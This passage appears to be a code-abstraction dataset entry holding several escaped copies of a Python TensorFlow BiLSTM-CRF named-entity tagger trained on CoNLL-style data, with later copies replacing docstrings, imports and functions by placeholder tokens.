batch_x = test_X[i: min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i: min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])]\n acc, cost = sess.run(\n [model.accuracy, model.cost],\n feed_dict={\n model.word_ids: batch_x,\n model.char_ids: batch_char,\n model.labels: batch_y\n },\n )\n test_loss += cost\n test_acc += acc\n print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc))\n\n train_loss /= len(train_X) / batch_size\n train_acc /= len(train_X) / batch_size\n test_loss /= len(test_X) / batch_size\n test_acc /= len(test_X) / batch_size\n\n print('epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\\n'\n % (e, train_loss, train_acc, test_loss, test_acc))\n\n real_Y, predict_Y = [], []\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i: min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i: min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])]\n predicted = pred2label(\n sess.run(model.tags_seq,\n feed_dict={\n model.word_ids: batch_x,\n model.char_ids: batch_char,\n },\n )\n )\n real = pred2label(batch_y)\n predict_Y.extend(predicted)\n real_Y.extend(real)\n\n print(classification_report(np.array(real_Y).ravel(), np.array(predict_Y).ravel()))", "<docstring token>\nimport re\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import classification_report\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n \"\"\"\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n \"\"\"\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n \"\"\"\n :param string:\n :return:\n \"\"\"\n string = re.sub('[^A-Za-z0-9\\\\-\\\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\ndef to_title(string):\n if string.isupper():\n string = string.title()\n return string\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\ndef iter_seq(x):\n return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\nif __name__ == '__main__':\n left_train, right_train = parse('./data/eng.train')\n left_test, right_test = parse('./data/eng.testa')\n word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2}\n tag2idx = {'PAD': 0}\n char2idx = {'PAD': 0}\n word_idx = 3\n tag_idx = 1\n char_idx = 1\n train_X, train_Y = parse_XY(left_train, right_train)\n test_X, test_Y = parse_XY(left_test, right_test)\n idx2word = {idx: tag for tag, idx in word2idx.items()}\n idx2tag = {i: w for w, i in tag2idx.items()}\n seq_len = 50\n X_seq, Y_seq = to_train_seq(train_X, train_Y)\n X_char_seq = generate_char_seq(X_seq)\n print(X_seq.shape)\n print(X_char_seq.shape)\n X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y)\n X_char_seq_test = generate_char_seq(X_seq_test)\n print(X_seq_test.shape)\n print(X_char_seq_test.shape)\n train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq\n test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test\n tf.reset_default_graph()\n sess = tf.Session()\n dim_word = 64\n dim_char = 128\n dropout = 0.8\n learning_rate = 0.001\n hidden_size_char = 128\n hidden_size_word = 128\n num_layers = 2\n batch_size = 32\n model = Model(dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers)\n sess.run(tf.global_variables_initializer())\n for e in range(3):\n train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0\n for i in range(0, len(train_X), batch_size):\n batch_x = train_X[i:min(i + batch_size, train_X.shape[0])]\n batch_char = train_char[i:min(i + batch_size, train_X.shape[0])]\n batch_y = train_Y[i:min(i + batch_size, train_X.shape[0])]\n acc, cost, _ = sess.run([model.accuracy, model.cost, model.\n optimizer], feed_dict={model.word_ids: batch_x, model.\n char_ids: batch_char, model.labels: batch_y})\n train_loss += cost\n train_acc += acc\n print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.\n format(e, i // batch_size + 1, cost, acc))\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i:min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i:min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i:min(i + batch_size, test_X.shape[0])]\n acc, cost = sess.run([model.accuracy, model.cost], feed_dict={\n model.word_ids: batch_x, model.char_ids: batch_char, model.\n labels: batch_y})\n test_loss += cost\n test_acc += acc\n print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.\n format(e, i // batch_size + 1, cost, acc))\n train_loss /= len(train_X) / batch_size\n train_acc /= len(train_X) / batch_size\n test_loss /= len(test_X) / batch_size\n test_acc /= len(test_X) / batch_size\n print(\n 'epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\\n'\n % (e, train_loss, train_acc, test_loss, test_acc))\n real_Y, predict_Y = [], []\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i:min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i:min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i:min(i + batch_size, test_X.shape[0])]\n predicted = pred2label(sess.run(model.tags_seq, feed_dict={model.\n word_ids: batch_x, model.char_ids: batch_char}))\n real = pred2label(batch_y)\n predict_Y.extend(predicted)\n real_Y.extend(real)\n print(classification_report(np.array(real_Y).ravel(), np.array(\n predict_Y).ravel()))\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n \"\"\"\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n \"\"\"\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n \"\"\"\n :param string:\n :return:\n \"\"\"\n string = re.sub('[^A-Za-z0-9\\\\-\\\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\ndef to_title(string):\n if string.isupper():\n string = string.title()\n return string\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\ndef iter_seq(x):\n return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\nif __name__ == '__main__':\n left_train, right_train = parse('./data/eng.train')\n left_test, right_test = parse('./data/eng.testa')\n word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2}\n tag2idx = {'PAD': 0}\n char2idx = {'PAD': 0}\n word_idx = 3\n tag_idx = 1\n char_idx = 1\n train_X, train_Y = parse_XY(left_train, right_train)\n test_X, test_Y = parse_XY(left_test, right_test)\n idx2word = {idx: tag for tag, idx in word2idx.items()}\n idx2tag = {i: w for w, i in tag2idx.items()}\n seq_len = 50\n X_seq, Y_seq = to_train_seq(train_X, train_Y)\n X_char_seq = generate_char_seq(X_seq)\n print(X_seq.shape)\n print(X_char_seq.shape)\n X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y)\n X_char_seq_test = generate_char_seq(X_seq_test)\n print(X_seq_test.shape)\n print(X_char_seq_test.shape)\n train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq\n test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test\n tf.reset_default_graph()\n sess = tf.Session()\n dim_word = 64\n dim_char = 128\n dropout = 0.8\n learning_rate = 0.001\n hidden_size_char = 128\n hidden_size_word = 128\n num_layers = 2\n batch_size = 32\n model = Model(dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers)\n sess.run(tf.global_variables_initializer())\n for e in range(3):\n train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0\n for i in range(0, len(train_X), batch_size):\n batch_x = train_X[i:min(i + batch_size, train_X.shape[0])]\n batch_char = train_char[i:min(i + batch_size, train_X.shape[0])]\n batch_y = train_Y[i:min(i + batch_size, train_X.shape[0])]\n acc, cost, _ = sess.run([model.accuracy, model.cost, model.\n optimizer], feed_dict={model.word_ids: batch_x, model.\n char_ids: batch_char, model.labels: batch_y})\n train_loss += cost\n train_acc += acc\n print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.\n format(e, i // batch_size + 1, cost, acc))\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i:min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i:min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i:min(i + batch_size, test_X.shape[0])]\n acc, cost = sess.run([model.accuracy, model.cost], feed_dict={\n model.word_ids: batch_x, model.char_ids: batch_char, model.\n labels: batch_y})\n test_loss += cost\n test_acc += acc\n print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.\n format(e, i // batch_size + 1, cost, acc))\n train_loss /= len(train_X) / batch_size\n train_acc /= len(train_X) / batch_size\n test_loss /= len(test_X) / batch_size\n test_acc /= len(test_X) / batch_size\n print(\n 'epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\\n'\n % (e, train_loss, train_acc, test_loss, test_acc))\n real_Y, predict_Y = [], []\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i:min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i:min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i:min(i + batch_size, test_X.shape[0])]\n predicted = pred2label(sess.run(model.tags_seq, feed_dict={model.\n word_ids: batch_x, model.char_ids: batch_char}))\n real = pred2label(batch_y)\n predict_Y.extend(predicted)\n real_Y.extend(real)\n print(classification_report(np.array(real_Y).ravel(), np.array(\n predict_Y).ravel()))\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n \"\"\"\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n \"\"\"\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n \"\"\"\n :param string:\n :return:\n \"\"\"\n string = re.sub('[^A-Za-z0-9\\\\-\\\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\ndef to_title(string):\n if string.isupper():\n string = string.title()\n return string\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\ndef iter_seq(x):\n return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n \"\"\"\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n \"\"\"\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n \"\"\"\n :param string:\n :return:\n \"\"\"\n string = re.sub('[^A-Za-z0-9\\\\-\\\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\ndef to_title(string):\n if string.isupper():\n string = string.title()\n return string\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\n<function token>\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 